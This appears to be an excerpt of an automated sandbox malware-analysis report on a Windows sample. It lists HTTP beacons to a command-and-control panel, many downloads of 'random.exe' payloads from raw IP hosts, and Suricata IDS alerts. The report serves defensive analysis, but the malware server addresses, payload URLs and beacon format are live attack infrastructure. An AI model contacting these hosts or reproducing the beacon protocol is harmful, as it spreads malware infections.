Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.21.50.161 104.21.50.161

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49783 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49800 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49811 -> 23.37.186.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49833 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49864 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49881 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49901 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49924 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49949 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49953 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49974 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49970 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49979 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49994 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49998 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49996 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50005 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49906 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50041 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50048 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50063 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50052 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50066 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50091 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50092 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50099 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50101 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50102 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50105 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50098 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50109 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50112 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50318 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50382 -> 104.102.49.254:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D7E0C0 recv,recv,recv,recv,

0_2_00D7E0C0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /kNcZsqQOSglxukmuLodY1734167391?argument=FZqYgjrfNlBaz3kN1734343413 HTTP/1.1Host: home.twentygr20sb.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
